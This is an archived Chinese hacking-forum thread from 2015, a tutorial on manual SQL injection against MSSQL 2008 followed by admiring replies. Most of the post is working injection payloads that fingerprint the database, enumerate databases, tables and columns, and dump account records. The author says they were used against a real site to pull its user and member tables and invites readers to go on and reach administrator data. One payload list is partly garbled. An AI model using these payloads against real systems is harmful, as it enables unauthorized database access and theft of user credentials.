Select Browser Mobile | Continue

Silic Group Froum Archive - Silic Security

 Forgot Password?
 Join Us
Search
Show: 4073|Reply: 12

[原创] 针对MSSQL 2008获取账户信息的一次手工注入

  [Copy URL]
Posted 2015-5-2 23:58:48 | Show all replies |Read Mode
本帖最后由 iverson5 于 2015-5-3 14:49 编辑
呵呵,看到了MSSQL第一次哦~  看到数据是2008的 ,发现论坛没有,哇咔咔,我特此来一发。

------------------
标题:针对MSSQL 2008获取账户信息的一次手工注入
作者:IversOn5
来自:5号黯区
首发:习科网络信息技术论坛
-----------------

①判断数据库类型
  1. and exists (select * from sysobjects)--返回正常为mssql(也名sql server)
  2. and exists (select count(*) from sysobjects)--有时上面那个语句不行就试试这个哈
Copy




②判断数据库版本
  1.        and 1=@@@version--这个语句要在有回显的模式下才可以哦
  2.        and substring((select @@@version),22,4)='2008'--适用于无回显模式,后面的2008就是数据库版本,返回正常就是2008的
Copy



第一条语句执行效果图(类似):
01.png

第二条语句执行效果图:(如果是2008的话就返回正常)
02.png


③获取所有数据库的个数 (一下3条语句可供选择使用)
   
  1. 1. and 1=(select quotename(count(name)) from master..sysdatabases)--

  2.    2. and 1=(select cast(count(name) as varchar)%2bchar(1) from master..sysdatabases) --

  3.    3. and 1=(select str(coun、    and 1=(select quotename(count(name)) from master..sysdatabases where dbid>5)--

  4.     and 1=(select str(count(name))%2b'|' from master..sysdatabases where dbid>5) --

  5.     and 1=(select cast(count(name) as varchar)%2bchar(1) from master..sysdatabases where dbid>5) --

  6. 说明:dbid从1-4的数据库一般为系统数据库.
Copy


⑤获取数据库 (该语句是一次性获取全部数据库的,且语句只适合>=2005,两条语句可供选择使用)


   
  1.     and 1=(select quotename(name) from master..sysdatabases FOR XML PATH(''))--

  2.     and 1=(select '|'%2bname%2b'|' from master..sysdatabases FOR XML PATH(''))--
Copy




语句测试效果图:
03.png


⑥获取当前数据库
  
  1. and db_name()>0
Copy

⑦获取当前数据库中的表(有2个语句可供选择使用)【下列语句可一次爆数据库所有表(只限于mssql2005及以上版本)】
  1.     and 1=(select quotename(name) from 数据库名..sysobjects where xtype='U' FOR XML PATH(''))--

  2.     and 1=(select '|'%2bname%2b'|' from 数据库名..sysobjects where xtype='U' FOR XML PATH(''))--
Copy


测试效果图:
04.png

得到 3个敏感的表:Whir_Sec_Users/Whir_Mem_Member/Whir_Mem_MemberGroup

⑧获得表里的列

  1. 一次爆指定表的所有列(只限于mssql2005及以上版本):

  2.     and 1=(select quotename(name) from 数据库名..syscolumns where id =(select id from 数据库名..sysobjects where name='指定表名') FOR XML PATH(''))--

  3.     and 1=(select '|'%2bname%2b'|' from 数据库名..syscolumns where id =(select id from 数据库名..sysobjects where name='指定表名') FOR XML PATH(''))--
Copy

效果图:
05.png

既然有账户信息,我就不管是不是管理员的的了,我帖子的目的不是为了得到管理员的信息,只是为了演示可以通过这个方法来获取相关信息。

⑨获取指定数据库中的表的列的数据库
  1. 逐条爆指定表的所有字段的数据(只限于mssql2005及以上版本):

  2.     and 1=(select top 1 * from 指定数据库..指定表名 where排除条件 FOR XML PATH(''))--

  3. 一次性爆N条所有字段的数据(只限于mssql2005及以上版本):

  4.     and 1=(select top N * from 指定数据库..指定表名 FOR XML PATH(''))--
Copy


第一条语句:and 1=(select top 1 * from 指定数据库..指定表名 FOR XML PATH(''))--测试效果图:

06.png




----------------------------------

加上where条件筛选结果出来会更加好,如:where and name like '%user%'  就会筛选出含有user关键词的出来。用在筛选表段时很不错。





注意:在使用一次获取数据库信息的语句时,请使用火狐浏览器,笔者测试 IE8、360急速浏览器、猎豹浏览器均卡死,火狐浏览器也会导致出现几秒钟的卡死,弹出框框,我们点击“停止脚本”就会得到初步解决。!!!!!!!!!!!!!!!!!!!!



至此,我们已经得到了账户信息了,至于管理员的呢,哈哈,大家自行测试时换表啥的就好了。








Rate

2

View all rate

color The user has been deleted
Posted 2015-5-3 14:03:38 | Show all replies
谢谢~~ 已搜藏
xxbuther The user has been deleted
Posted 2015-5-4 10:16:40 | Show all replies
来涨下姿势
Tesla The user has been deleted
Posted 2015-5-4 20:44:34 | Show all replies
感觉楼主就是在用一个例子解释这些语句是什么意思一样
 Author| Posted 2015-5-4 22:22:08 | Show all replies
Tesla 发表于 2015-5-4 20:44
感觉楼主就是在用一个例子解释这些语句是什么意思一样

无论如何,下次,遇到mssql>=2005总能快一点了吧。
muzhou72 The user has been deleted
Posted 2015-5-5 04:49:12 | Show all replies
这么厉害啦,谢谢分享。努力学习!
野生萝莉 The user has been deleted
Posted 2015-5-5 08:05:54 | Show all replies
学习了,楼主威武!
show05123 The user has been deleted
Posted 2015-5-10 09:51:06 | Show all replies
这么厉害啦,谢谢分享
魂淡、 The user has been deleted
Posted 2015-5-14 16:43:00 | Show all replies
真棒,mysql的也来讲解一下吗
 Author| Posted 2015-5-14 18:13:09 | Show all replies
魂淡、 发表于 2015-5-14 16:43
真棒,mysql的也来讲解一下吗

这里不是有么?
bbs.blackbap.org/thread-2433-1-1.html
1669178846 The user has been deleted
Posted 2016-7-3 13:12:21 | Show all replies
感谢大神的分享,已收藏
lshack The user has been deleted
Posted 2016-7-25 11:03:34 | Show all replies
靠谱。崇尚手工精神
采菇凉的小蘑菇 The user has been deleted
Posted 2016-8-3 10:56:52 | Show all replies
学习了 楼主厉害
You need to login before reply! Login | Join Us

Credit Rules of This Forum

Close

公告Privious /1 Next

小黑屋|手机版|Archiver|Silic Security

GMT+8, 2017-3-24 10:07

© 2001-2014 Silic Corp.

Quick Reply Top Return List